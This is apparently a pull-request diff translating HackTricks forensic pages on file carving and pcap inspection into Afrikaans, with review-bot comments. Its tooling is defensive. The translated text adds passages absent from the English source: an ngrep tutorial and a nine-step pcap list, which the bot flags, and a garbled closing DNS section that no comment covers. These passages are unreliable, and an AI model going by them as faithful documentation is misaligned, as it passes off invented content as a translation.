-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
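Review bot: the translated lines drop the blank lines that separated paragraphs from each other and from the fenced code blocks, which changes how the Markdown renders. In the Binwalk section the line "+**Binwalk** is 'n gereedskap vir die analise van binêre lêers ..." is now immediately followed by "+**Nuttige opdragte**:", so that label merges into the preceding paragraph; the same happens in the Bulk Extractor section, where "+Hierdie instrument kom binne kali ..." runs straight into "+Hierdie instrument kan 'n beeld skandeer ...". Restore the removed blank lines (the "-" lines in this hunk) around those paragraphs and before each fenced block so the layout matches the English source. Also "+Laai dit hier af: [here](https://sourceforge.net/projects/findaes/)." leaves the link text in English; "[hier]" would be consistent with the rest of the translation. Minor: "skyfbeelders" is not the plural of "skyfbeeld" ("skyfbeelde"), and the "#Insllation" typo in the untranslated code comment is carried over unchanged.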
- - diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md index 54fc4a1be..d8b9468ef 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md @@ -1,105 +1,93 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Carving tools +# Uitsnygereedskap ## Autopsy -The most common tool used in forensics to extract files from images is [**Autopsy**](https://www.autopsy.com/download/). Download it, install it and make it ingest the file to find "hidden" files. Note that Autopsy is built to support disk images and other kind of images, but not simple files. +Die mees algemene gereedskap wat in forensika gebruik word om lêers uit beelde te onttrek, is [**Autopsy**](https://www.autopsy.com/download/). Laai dit af, installeer dit en laat dit die lêer inneem om "verborge" lêers te vind. Let daarop dat Autopsy gebou is om skyfbeelds en ander soorte beelde te ondersteun, maar nie eenvoudige lêers nie. ## Binwalk -**Binwalk** is a tool for searching binary files like images and audio files for embedded files and data. -It can be installed with `apt` however the [source](https://github.com/ReFirmLabs/binwalk) can be found on github. -**Useful commands**: - +**Binwalk** is 'n gereedskap om binêre lêers soos beelde en klanklêers te soek vir ingebedde lêers en data. +Dit kan geïnstalleer word met `apt`, maar die [bron](https://github.com/ReFirmLabs/binwalk) kan op GitHub gevind word. +**Nuttige opdragte**: ```bash sudo apt install binwalk #Insllation binwalk file #Displays the embedded data in the given file binwalk -e file #Displays and extracts some files from the given file binwalk --dd ".*" file #Displays and extracts all files from the given file ``` - ## Foremost -Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for it's default configured file types. - +'n Ander algemene instrument om verskuilde lêers te vind is **foremost**. Jy kan die opsetlêer van foremost in `/etc/foremost.conf` vind. As jy net wil soek na sekere spesifieke lêers, verwyder die kommentaarmerke. 
As jy niks verwyder nie, sal foremost soek na sy verstek geconfigureerde lêertipes. ```bash sudo apt-get install foremost foremost -v -i file.img -o output #Discovered files will appear inside the folder "output" ``` - ## **Scalpel** -**Scalpel** is another tool that can be use to find and extract **files embedded in a file**. In this case you will need to uncomment from the configuration file \(_/etc/scalpel/scalpel.conf_\) the file types you want it to extract. - +**Scalpel** is nog 'n instrument wat gebruik kan word om **lêers wat in 'n lêer ingebed is** te vind en te onttrek. In hierdie geval moet jy die lêertipes wat jy wil onttrek, ontkommentarieer uit die konfigurasie-lêer (_/etc/scalpel/scalpel.conf_). ```bash sudo apt-get install scalpel scalpel file.img -o output ``` - ## Bulk Extractor -This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor) - -This tool can scan an image and will **extract pcaps** inside it, **network information\(URLs, domains, IPs, MACs, mails\)** and more **files**. You only have to do: +Hierdie instrument kom binne kali, maar jy kan dit hier vind: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor) +Hierdie instrument kan 'n beeld skandeer en sal **pcaps onttrek** binne dit, **netwerkinligting\(URL's, domeine, IP's, MAC's, e-posse\)** en meer **lêers**. Jy hoef net die volgende te doen: ```text bulk_extractor memory.img -o out_folder ``` - -Navigate through **all the information** that the tool has gathered \(passwords?\), **analyse** the **packets** \(read[ **Pcaps analysis**](../pcap-inspection/)\), search for **weird domains** \(domains related to **malware** or **non-existent**\). 
+Navigeer deur **alle inligting** wat die instrument ingesamel het \(wagwoorde?\), **analiseer** die **pakkies** \(lees [**Pcaps-analise**](../pcap-inspection/)\), soek na **vreemde domeine** \(domeine wat verband hou met **kwaadwillige sagteware** of **nie-bestaande**\). ## PhotoRec -You can find it in [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) +Jy kan dit vind by [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) -It comes with GUI and CLI version. You can select the **file-types** you want PhotoRec to search for. +Dit kom met 'n GUI- en CLI-weergawe. Jy kan die **lêertipes** kies wat PhotoRec moet soek. ![](../../../.gitbook/assets/image%20%28524%29.png) -# Specific Data Carving Tools +# Spesifieke Data Carving-instrumente ## FindAES -Searches for AES keys by searching for their key schedules. Able to find 128. 192, and 256 bit keys, such as those used by TrueCrypt and BitLocker. +Soek na AES-sleutels deur te soek na hul sleutelskedules. In staat om 128, 192 en 256 bit sleutels te vind, soos dié wat deur TrueCrypt en BitLocker gebruik word. -Download [here](https://sourceforge.net/projects/findaes/). +Laai [hier af](https://sourceforge.net/projects/findaes/). -# Complementary tools +# Aanvullende instrumente -You can use [**viu** ](https://github.com/atanunq/viu)to see images form the terminal. -You can use the linux command line tool **pdftotext** to transform a pdf into text and read it. +Jy kan [**viu** ](https://github.com/atanunq/viu)gebruik om beelde vanuit die terminaal te sien. +Jy kan die Linux-opdraglyn-instrument **pdftotext** gebruik om 'n pdf in te omskep na teks en dit te lees.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks in PDF aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
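Review bot: same paragraph-merging problem as in file-data-carving-recovery-tools.md in this PR: the blank line between "+Dit kan geïnstalleer word met apt, maar die bron kan op GitHub gevind word." and "+**Nuttige opdragte**:" and the one between the two Bulk Extractor paragraphs were removed, so those lines now render as a single paragraph; keep the blank lines from the English source. "+Jy kan die Linux-opdraglyn-instrument **pdftotext** gebruik om 'n pdf in te omskep na teks" is ungrammatical ("om 'n pdf na teks om te skakel" or "in teks te omskep"). Terminology also differs between the two carving pages in this same PR ("# Uitsnygereedskap" here versus "# Carving & Herstelgereedskap" there; "inneem" versus "insluk" for ingest; "skyfbeelds" versus "skyfbeelders", neither of which is the correct plural "skyfbeelde"); pick one rendering of "carving" and use it in both files.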
- - diff --git a/forensics/basic-forensic-methodology/pcap-inspection/README.md b/forensics/basic-forensic-methodology/pcap-inspection/README.md index 8500de6fe..767fcf125 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/README.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/README.md @@ -1,158 +1,189 @@ -# Pcap Inspection +# Pcap Inspeksie
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline. {% embed url="https://www.rootedcon.com/" %} {% hint style="info" %} -A note about **PCAP** vs **PCAPNG**: there are two versions of the PCAP file format; **PCAPNG is newer and not supported by all tools**. You may need to convert a file from PCAPNG to PCAP using Wireshark or another compatible tool, in order to work with it in some other tools. +'n Nota oor **PCAP** vs **PCAPNG**: daar is twee weergawes van die PCAP-lêerformaat; **PCAPNG is nuwer en nie deur alle gereedskap ondersteun nie**. Jy mag 'n lêer van PCAPNG na PCAP moet omskakel deur Wireshark of 'n ander kompatibele gereedskap te gebruik, om daarmee te werk in ander gereedskap. 
{% endhint %} -## Online tools for pcaps +## Aanlyn gereedskap vir pcaps -* If the header of your pcap is **broken** you should try to **fix** it using: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) -* Extract **information** and search for **malware** inside a pcap in [**PacketTotal**](https://packettotal.com) -* Search for **malicious activity** using [**www.virustotal.com**](https://www.virustotal.com) and [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) +* As die kop van jou pcap **beskadig** is, moet jy probeer om dit te **herstel** deur gebruik te maak van: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) +* Onttrek **inligting** en soek na **kwaadwillige sagteware** binne 'n pcap in [**PacketTotal**](https://packettotal.com) +* Soek na **skadelike aktiwiteit** deur gebruik te maak van [**www.virustotal.com**](https://www.virustotal.com) en [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) -## Extract Information +## Onttrek Inligting -The following tools are useful to extract statistics, files, etc. +Die volgende gereedskap is nuttig om statistieke, lêers, ens. te onttrek. ### Wireshark {% hint style="info" %} -**If you are going to analyze a PCAP you basically must to know how to use Wireshark** +**As jy 'n PCAP gaan analiseer, moet jy basies weet hoe om Wireshark te gebruik** {% endhint %} -You can find some Wireshark tricks in: +Jy kan 'n paar Wireshark-truuks vind in: {% content-ref url="wireshark-tricks.md" %} [wireshark-tricks.md](wireshark-tricks.md) {% endcontent-ref %} -### Xplico Framework +### Xplico-raamwerk -[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico, extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on. 
- -**Install** +[**Xplico** ](https://github.com/xplico/xplico)_(slegs Linux)_ kan 'n **pcap** analiseer en inligting daaruit onttrek. Byvoorbeeld, van 'n pcap-lêer onttrek Xplico elke e-pos (POP, IMAP en SMTP-protokolle), alle HTTP-inhoud, elke VoIP-oproep (SIP), FTP, TFTP, en so aan. +**Installeer** ```bash sudo bash -c 'echo "deb http://repo.xplico.org/ $(lsb_release -s -c) main" /etc/apt/sources.list' sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 791C25CE sudo apt-get update sudo apt-get install xplico ``` - -**Run** - +**Voer uit** ``` /etc/init.d/apache2 restart /etc/init.d/xplico start ``` +Kry toegang tot _**127.0.0.1:9876**_ met geloofsbriewe _**xplico:xplico**_ -Access to _**127.0.0.1:9876**_ with credentials _**xplico:xplico**_ - -Then create a **new case**, create a **new session** inside the case and **upload the pcap** file. +Skep dan 'n **nuwe saak**, skep 'n **nuwe sessie** binne die saak en **laai die pcap-lêer op**. ### NetworkMiner -Like Xplico it is a tool to **analyze and extract objects from pcaps**. It has a free edition that you can **download** [**here**](https://www.netresec.com/?page=NetworkMiner). It works with **Windows**.\ -This tool is also useful to get **other information analysed** from the packets in order to be able to know what was happening in a **quicker** way. +Soos Xplico is dit 'n instrument om **analiseer en voorwerpe uit pcaps te onttrek**. Dit het 'n gratis uitgawe wat jy kan **aflaai** [**hier**](https://www.netresec.com/?page=NetworkMiner). Dit werk met **Windows**.\ +Hierdie instrument is ook nuttig om **ander inligting geanaliseer** uit die pakkies te kry om te kan weet wat in 'n **vinniger** manier gebeur het. 
### NetWitness Investigator -You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(It works in Windows)**.\ -This is another useful tool that **analyses the packets** and sorts the information in a useful way to **know what is happening inside**. +Jy kan [**NetWitness Investigator hier aflaai**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(Dit werk in Windows)**.\ +Dit is 'n ander nuttige instrument wat die pakkies **analiseer** en die inligting op 'n nuttige manier **sorteer om te weet wat binne gebeur**. ### [BruteShark](https://github.com/odedshimon/BruteShark) -* Extracting and encoding usernames and passwords (HTTP, FTP, Telnet, IMAP, SMTP...) -* Extract authentication hashes and crack them using Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...) -* Build a visual network diagram (Network nodes & users) -* Extract DNS queries -* Reconstruct all TCP & UDP Sessions -* File Carving +* Uitpak en enkode gebruikersname en wagwoorde (HTTP, FTP, Telnet, IMAP, SMTP...) +* Onttrek verifikasiehasings en kraak hulle met behulp van Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...) +* Bou 'n visuele netwerkdiagram (Netwerknodes & gebruikers) +* Onttrek DNS-navrae +* Herkonstrueer alle TCP- en UDP-sessies +* Lêer uitsnyding ### Capinfos - ``` capinfos capture.pcap ``` - ### Ngrep -If you are **looking** for **something** inside the pcap you can use **ngrep**. Here is an example using the main filters: +As jy **iets** binne die pcap soek, kan jy **ngrep** gebruik. Hier is 'n voorbeeld wat die hooffilters gebruik: +```bash +ngrep -I file.pcap 'filter' +``` + +Die `-I` vlag dui aan dat die bron 'n lêer is, en `file.pcap` is die naam van die pcap-lêer wat jy wil ondersoek. Die `'filter'` argument is die soekfilter wat jy wil gebruik om spesifieke data te vind binne die pcap-lêer. 
+ +Hier is 'n paar voorbeelde van ngrep-filters wat jy kan gebruik: + +- `tcp` - Soek na TCP-verbindings. +- `udp` - Soek na UDP-verbindings. +- `port 80` - Soek na verbindings op poort 80. +- `host 192.168.1.1` - Soek na verbindings na die IP-adres 192.168.1.1. +- `src host 192.168.1.1` - Soek na verbindings waarvan die bron-IP-adres 192.168.1.1 is. +- `dst host 192.168.1.1` - Soek na verbindings waarvan die bestemmings-IP-adres 192.168.1.1 is. + +Jy kan ook meer komplekse filters gebruik deur logiese operatore soos `and`, `or` en `not` te gebruik. Byvoorbeeld: + +- `tcp and port 80` - Soek na TCP-verbindings op poort 80. +- `udp or port 53` - Soek na UDP-verbindings of verbindings op poort 53. +- `not host 192.168.1.1` - Soek na verbindings wat nie na die IP-adres 192.168.1.1 gaan nie. + +Met ngrep kan jy spesifieke data binne die pcap-lêer vind deur die filters te gebruik wat die beste by jou ondersoek pas. ```bash ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168" ``` +### Uithol -### Carving - -Using common carving techniques can be useful to extract files and information from the pcap: +Die gebruik van algemene uitholtegnieke kan nuttig wees om lêers en inligting uit die pcap te onttrek: {% content-ref url="../partitions-file-systems-carving/file-data-carving-recovery-tools.md" %} [file-data-carving-recovery-tools.md](../partitions-file-systems-carving/file-data-carving-recovery-tools.md) {% endcontent-ref %} -### Capturing credentials +### Vang van geloofsbriewe -You can use tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface. +Jy kan gereedskap soos [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) gebruik om geloofsbriewe uit 'n pcap of 'n lewendige koppelvlak te ontled.
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com/) is die mees relevante sibersekuriteitsgebeurtenis in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en sibersekuriteitsprofessionals in elke dissipline. {% embed url="https://www.rootedcon.com/" %} -## Check Exploits/Malware +## Kontroleer Uitbuitings/Malware ### Suricata -**Install and setup** - +**Installeer en stel op** ``` apt-get install suricata apt-get install oinkmaster echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules ``` +**Kyk na pcap** -**Check pcap** +Om 'n pcap-lêer te ondersoek, kan jy die volgende stappe volg: +1. **Identifiseer die doel van die ondersoek**: Bepaal wat jy probeer vind of bewys in die pcap-lêer. + +2. **Installeer 'n pcap-analisehulpmiddel**: Gebruik 'n geskikte hulpmiddel soos Wireshark om die pcap-lêer te ontleed en te ondersoek. + +3. **Analiseer die netwerkverkeer**: Bestudeer die verskillende netwerkverbindings en -protokolle in die pcap-lêer. Identifiseer verdagte aktiwiteite, ongewone patrone of enige ander potensiële aanwysers van 'n aanval. + +4. **Identifiseer die bronne en bestemmings**: Kyk na die bron- en bestemmings-IP-adresse en -poorte om te bepaal watter entiteite betrokke is by die kommunikasie. Identifiseer enige onbekende of verdagte bronne of bestemmings. + +5. **Ondersoek die inhoud van die kommunikasie**: Ontleed die inhoud van die kommunikasie in die pcap-lêer. 
Kyk na die datastrome, HTTP-aanvrae, e-posse, enige gevoelige inligting of enige ander relevante inligting wat kan help om die aard van die aanval of die kommunikasie te bepaal. + +6. **Volg die tydlyn**: Analiseer die tydlyn van die netwerkverkeer om die volgorde van gebeure te bepaal en om te sien of daar enige tydgebaseerde patrone of verdagte aktiwiteite is. + +7. **Identifiseer enige verdagte aktiwiteite**: Let op enige verdagte aktiwiteite, soos ongewone poorte, onbekende protokolle, ongewone datastrome, onverwagte kommunikasiepatrone, of enige ander afwykings van normale netwerkgedrag. + +8. **Verkry aanvullende inligting**: Indien nodig, gebruik ander tegnieke soos DNS-navrae, WHOIS-opsoek, IP-adresopsporing, of enige ander relevante inligting om verdere konteks te verkry oor die bronne of bestemmings in die pcap-lêer. + +9. **Stel 'n verslag op**: Maak 'n gedetailleerde verslag van jou bevindinge, insluitend enige verdagte aktiwiteite, potensiële aanwysers van 'n aanval, en enige ander relevante inligting. ``` suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log ``` - ### YaraPcap -[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is a tool that +[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is 'n instrument wat -* Reads a PCAP File and Extracts Http Streams. -* gzip deflates any compressed streams -* Scans every file with yara -* Writes a report.txt -* Optionally saves matching files to a Dir +* 'n PCAP-lêer lees en HTTP-strome onttrek. +* gzip defleer enige gekomprimeerde strome +* Skandeer elke lêer met yara +* Skryf 'n report.txt +* Opsioneel stoor ooreenstemmende lêers in 'n gids -### Malware Analysis +### Malware-analise -Check if you can find any fingerprint of a known malware: +Kyk of jy enige vingerafdruk van 'n bekende malware kan vind: {% content-ref url="../malware-analysis.md" %} [malware-analysis.md](../malware-analysis.md) 
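Review bot: Two blocks in this hunk are new content rather than translation, which a PR whose stated purpose is "Translated to Afrikaans" should not introduce: the ngrep filter tutorial ("Hier is 'n paar voorbeelde van ngrep-filters wat jy kan gebruik" through "Met ngrep kan jy spesifieke data binne die pcap-lêer vind") and the nine-step list under "**Kyk na pcap**" ("1. **Identifiseer die doel van die ondersoek**" through "9. **Stel 'n verslag op**"). The English source has only the heading followed by the `suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log` command, so the added list leaves that command dangling under "Stel 'n verslag op" as if it produced the report; drop both added blocks so the Afrikaans page mirrors the English one. Also restore the blank lines removed between "**Installeer en stel op**" and its code fence and between "pas." and the bash fence, and consider keeping "Carving" rather than "Uithol", since the linked page and the tooling use the English term.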
@@ -160,12 +191,11 @@ Check if you can find any fingerprint of a known malware: ## Zeek -> [Zeek](https://docs.zeek.org/en/master/about.html) is a passive, open-source network traffic analyzer. Many operators use Zeek as a Network Security Monitor (NSM) to support investigations of suspicious or malicious activity. Zeek also supports a wide range of traffic analysis tasks beyond the security domain, including performance measurement and troubleshooting. +> [Zeek](https://docs.zeek.org/en/master/about.html) is 'n passiewe, oopbron-netwerkverkeerontleder. Baie operateurs gebruik Zeek as 'n Netwerksekuriteitsmonitor (NSM) om ondersoeke na verdagte of skadelike aktiwiteit te ondersteun. Zeek ondersteun ook 'n wye reeks verkeersontledingsopdragte buite die sekuriteitsdomein, insluitend prestasiemeting en foutopsporing. -Basically, logs created by `zeek` aren't **pcaps**. Therefore you will need to use **other tools** to analyse the logs where the **information** about the pcaps are. - -### Connections Info +Basies is logboeke wat deur `zeek` geskep word nie **pcaps** nie. Jy sal dus **ander instrumente** moet gebruik om die logboeke waar die **inligting** oor die pcaps is, te analiseer. +### Verbindingsinligting ```bash #Get info about longest connections (add "grep udp" to see only udp traffic) #The longest connection might be of malware (constant reverse shell?) 
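Review bot: Blank lines were dropped around "### Verbindingsinligting": the heading now sits directly under the Zeek paragraph and the bash fence directly under the heading. GitBook markdown tolerates this, but the rest of the file keeps a blank line before headings and fences, so restore them for consistency. Minor wording: "verkeersontledingsopdragte" reads as "traffic analysis commands"; "take" (tasks) is the closer rendering of "traffic analysis tasks".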
@@ -215,9 +245,35 @@ Score,Source IP,Destination IP,Connections,Avg Bytes,Intvl Range,Size Range,Top 1,10.55.100.111,165.227.216.194,20054,92,29,52,1,52,7774,20053,0,0,0,0 0.838,10.55.200.10,205.251.194.64,210,69,29398,4,300,70,109,205,0,0,0,0 ``` +### DNS-inligting -### DNS info +DNS (Domain Name System) is 'n protokol wat gebruik word om IP-adresse aan domeinname te koppel. Dit vertaal mensverstaanbare domeinname na numeriese IP-adresse wat deur rekenaars gebruik word om met mekaar te kommunikeer. +DNS-inligting kan waardevol wees vir forensiese ondersoeke, omdat dit kan help om die aktiwiteite van 'n gebruiker of 'n aanvaller te identifiseer. Deur 'n PCAP (Packet Capture) te ondersoek, kan jy DNS-verkeer analiseer en inligting verkry soos die IP-adresse van besoekte webwerwe, DNS-navrae en DNS-antwoorde. + +Hier is 'n paar nuttige DNS-inligting wat jy uit 'n PCAP kan ontleed: + +#### DNS-navrae + +DNS-navrae is versoek wat deur 'n rekenaar gestuur word om die IP-adres van 'n spesifieke domeinnaam te bekom. Dit kan aandui watter webwerwe of dienste besoek is. + +#### DNS-antwoorde + +DNS-antwoorde is die reaksies wat deur DNS-bedieners gestuur word om die IP-adres van 'n gevraagde domeinnaam te verskaf. Dit kan aandui watter IP-adresse besoek is en of daar enige ongewone of verdagte aktiwiteite plaasgevind het. + +#### DNS-tydskrifte + +DNS-tydskrifte is 'n log van DNS-navrae en -antwoorde wat deur 'n rekenaar gestuur en ontvang is. Dit kan gebruik word om die volledige DNS-geskiedenis van 'n rekenaar te ontleed en te analiseer. + +#### DNS-gebruikers + +DNS-gebruikers is die rekenaars of toestelle wat DNS-navrae en -antwoorde genereer. Deur die identifisering van hierdie gebruikers kan jy die bron van 'n spesifieke DNS-verkeer bepaal. + +#### DNS-tydskrif-analise + +DNS-tydskrif-analise behels die ontleed van DNS-tydskrifte om inligting te verkry oor die aktiwiteite van 'n rekenaar of netwerk. 
